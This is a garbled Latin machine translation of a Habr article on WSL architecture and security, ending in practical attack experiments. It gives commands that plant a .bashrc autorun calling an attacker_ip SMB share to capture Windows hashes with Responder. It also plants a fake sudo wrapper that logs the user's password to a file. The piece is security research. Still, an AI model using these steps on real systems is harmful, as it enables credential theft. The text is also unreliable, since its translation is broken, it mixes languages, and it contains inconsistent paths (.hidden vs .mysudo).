Heus, Habr! OTUS novum cursum cursuum mense Octobri incipiet. Ante initium cursus, articulum ab Alexandro Kolesnikov, uno ex magistris nostris, scriptum communicamus.
Anno MMXVI, Microsoft novam technologiam, WSL, communitati IT introduxit (Windows Ssubsystema pro Linux), quod demum unionem competitorum antea inconciliabilium, qui de popularitate inter usores systematum operandi tam ordinarios quam peritos contendebant, permisit: Windows и LinuxHaec technologia facultatem utendi instrumentis systematis operativi praebuit. Linux circumdati Windows sine necessitate mittendi Linux, exempli gratia, utendo multi-boot. In Habr, invenire potes numerosos articulos qui utilitates usus WSL describunt. Attamen, infeliciter, tempore scribendi, nullae investigationes de securitate huius symbiosis systematum operandi in hac fonte inventae sunt. Haec inscriptio est conatus ad hoc corrigendum. Articulus proprietates architecturarum WSL 1 et 2 tractabit et exempla complura impetus in systemata his technologiis utentibus analysabit. Articulus in duas partes dividitur. Prima principales modos theoreticos impetus demonstrabit. Linux и WindowsSecundus articulus de constitutione ambitus probationum et reproductione impetuum tractabit.
WSL 1: Proprietates Architecturae
Ad plene intellegendas quaestiones securitatis WSL, necesse est subtilitates praecipuas cum implementatione subsystematis coniunctas cognoscere. Una ex praecipuis necessitatibus usorum quas WSL tractat est accessum ad terminales permittere. Linux systemata in hospite cum systemate operativo WindowsPraeterea, compatibilitas oblata tam nativa erat ut fasciculi executabiles... Linux (ELF) directe in systema immitti potest. WindowsAd haec proposita assequenda in Windows 10 Subsystema speciale creatum est quod applicationes incipere permittit Linux utens serie certarum vocationum systematis — ergo, conatus factus est ad seriem vocationum systematis designandam Linux on WindowsPhysice, hoc per additionem novorum rectorum et novi formae processus effectum est. Visualiter, architectura sic apparebat:
Fere, interactio cum systemate operativo Linux ordinatum est utens pluribus modulis nuclei et peculiari quodam processu—pico. Diagramma supra ostendit processum in instantia currentem Linux in hospite, indigena esse debet et eisdem opibus uti debet ac applicationes regulares. WindowsSed quomodo hoc fieri potest? In proiecto notiones processus elaboratae sunt ad Windows, quod omnes partes systematis operandi necessarias (pro versione sua) ad applicationem ex alio systemate operativo exsequendam praebebat.
Nota abstractionem propositam permisisse ne systema operativum (praesertim, Windows), quod alium processum systematis operandi incipiendum expectat, et rationem generalem proposuit.
Ergo, quaevis applicatio intra processum pico sine respectu ad nucleum currere potest. Windows:
- Quaestiones compatibilitatis et interpretatio vocationum systematis a praebitoribus dedicatis tractandae sunt;
- Imperium accessus per Monitorem Securitatis efficiendum est. Monitor in nucleo situs est, ideoque... Windows Emendatio necessaria erat in forma novi rectoris qui quasi provisor pro talibus processibus fungere posset. Prototypum processus pico schematice infra monstratur:
Quia systema fasciculorum Linux nomina fasciculorum et directoriorum, inter majusculas et minusculas utitur, Windows Duo genera systematis fasciculorum ad usum cum WSL addita sunt: VolFS et DriveFS. VolFS est implementatio systematis fasciculorum. Linux, DriveFS est systema fasciculorum quod secundum regulas operatur Windows, sed optionem habet nomina inter litteras maiusculas et minusculas eligendi.
WSL 2
WSL 1 nonnullas limitationes habebat quae impediebant ne ad solvendas amplissimas difficultates adhiberetur: exempli gratia, carebat facultas currendi 32-bit. Linux Applicationes rectores machinarum uti non poterant. Quare, anno 2020, WSL 2 divulgatum est, quod modum construendi subsystema mutavit. WSL 2 est machina virtualis optimizata quae cum notis consumptionis opum WSL 1 congruit. Nunc, pro problematis quae usor solvit, systema operandi... Windows, versionem requisitam subsystematis ad operandum eligere potes LinuxAd vulnerabilitates potentiales mitigandas, WSL 2 in fundamento Hyper-V implementatum est in... Windows 10In hac forma Windows facultatem habet nucleum systematis operandi seorsum currendi LinuxMeminerimus versionem primam WSL introductam esse ut functionem beta destinatam ad directionem progressionis demonstrandam. Windows in hac regione, ergo transitus ad Hyper-V inevitabilis erat. Architectura finalis hoc modo apparet:
In hac versione, nuclei systematis Windows и Linux Unumquodque suas habet opes et solum intra systema fasciculorum se invicem tenet, sed haec imbricatio longe abest a completa. Interactio inter systemata fasciculorum per involucrum clientis-servitoris, quod protocollo 9P operatur, perficitur.
Microsoft nunc facultatem commutandi inter WSL 1 et WSL 2 praebet. Ambae versiones ad usum praesto sunt.
Securitas WSL
In praesenti, plura studia exstant quae modos describunt ad instrumenta legitima systematis operandi adhibenda ad interactiones inter subsystemata oppugnanda. Eorum scenariis utemur ad momentum impetuum tempore scribendi probandum. Index generalis impetuum et scenariorum eorum:
1. Implementatio systematis fasciculorum: iura accessus, disponibilitas directoriorum communium/mechanismorum permutationis datorum.
Investigatio facta est de violatione regularum accessus ex Linux FS->Windows FS, Windows FS->Linux FSInvestigatio demonstravit facultatem mutandi fasciculum datum intra systema operandi destinatum. Conatus etiam facti sunt ad substituendos, creandos clones, et delendos partes systematum fasciculorum.
varius varius:
- A. Impetus a systemate operativo Windows — modificatio fasciculorum ex directorio /etc systematis operandi Linux.
- B. Impetus a systemate operativo Linux — modificatio fasciculorum in directoriis:
C:Windows,C:Program Files,C:Users<User>
2. Implementatio structurae retiariae.
Investigatio peracta est exemplis impetuum e systemate operativo utens. Linux on WindowsProprietates operationales stratis retium, praesertim rationes authenticationis pro variis opibus, exploratae sunt.
varius varius:
- Aperire accessum ad portum occupatum in systemate Windows
- Aperire portum sine permissionibus congruentibus
- Cursus involucri inversi utens fasciculo elf in systemate operativo Windows.
3. Initium processuum programmatum malignorum occultandum utens subsystemate WSL.
Investigatio in simplici facto fundata est: subsystemata securitatis eventa in alio nucleo sub legitimo provisore systematis operandi currente, in casu WSL 1, intercipere non possunt. In casu WSL 2, nulla via est ad eventa in nucleo separato intra machinam virtualem levioris occurrentia inspicienda.
varius varius:
1) Applicationem ad systema remotum accedendum incipe et eventa relata inspice.
Experimenta WSL 1: Interceptio Hash (OS) Windows)
Tandem ad partem practicam pervenimus. Primum, ambitum probationum praeparare debemus. Omnia experimenta in mensa probationum cum... Windows 10 Anno MMIV. Imago systematis operandi pro WSL electa erat. Ubuntu XVIII Aprilis. Imago temere electa est, et quaelibet alia aeque bene fungetur. Mandata ad basim erigendam:
Primum illud currere debes powershell.exe nomine administratoris.
Pro WSL 1, haec mandata exsequi debes:
- Activa-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystema-Linux #Functionem WSL activare
- Invocare-WebRequest -Uri sive .ms/wsl-ubuntu-1804
-ExFile ~/Ubuntu.appx -UseBasicParsing #Imaginem onerare Linux ex Microsoft Store
Postquam configurationem denuo incipias, mandatum "bash" exsequi potes. Si omnia recte functionaverunt, similem huic exitum in consola videbis. Windows:
Distributionem Kali ut machinam aggressoris utemur. Linux, omnes machinae in eadem rete locali esse debent.
Ponamus nos accessum sine privilegiis ad WSL in machina habere. WindowsConemur systema operativum oppugnare. Linux, mandatum vocans ex LinuxAd impetum exsequendum, simplici arte autorun utemur—scriptum nostrum ambitui addemus. LinuxAd hoc faciendum, fasciculum mutare debes. .bashrc.
In machina cum WSL, haec curre:
1. bash
2. Переходим в домашнюю директорию пользователя: cd /home/sam/
2. echo «/home/sam/.attack.sh» >> .bashrc
3. echo «icalcs.exe » \\\\attacker_ip\\shareName\\» > /dev/null 2>&1» >> .attack.sh
4. chmod u+x .attack.sh
5. exitAutocineto Kali Linux exequimur;
1. Responder -I eth0 -rdvwper currus Windows "Bash" curramus.
Resultatus machinae Kali exspectamus. Linux:
Ita hashes usoris habemus Windows per subsystema WSL mandatum in systemate exsequendo Linux.
Experimenta WSL 1: Accipiendo Tesseram Usoris (OS) Linux)
Aliud experimentum faciamus. Per hoc experimentum, ad fasciculum addemus .bashrc plura mandata ad tesseram usoris systematis operandi obtinendam Linux.
Incipiamus "bash" et mandata haec inseramus:
1. mkdir .hidden
2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
4. echo "echo """ >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo "Sorry, try again."" >> .mysudo/sudo
7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txt» >> .mysudo/sudo
8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit Ut impetus prospere eveniat, usor Sam "sudo" in terminali invocare debet. LinuxPost hoc, tessera usoris systematis operandi Linux in archivo erit pass.txt:
Implementatio impetus ad informationem theoreticam tantum data est.
Pars sequens articuli describet implementationem protocolli 9P, considerabit creationem scanneris pro hoc protocollo, et etiam impetum eo utens perficiet.
Index referentiarum
Lege plus
Source: www.habr.com
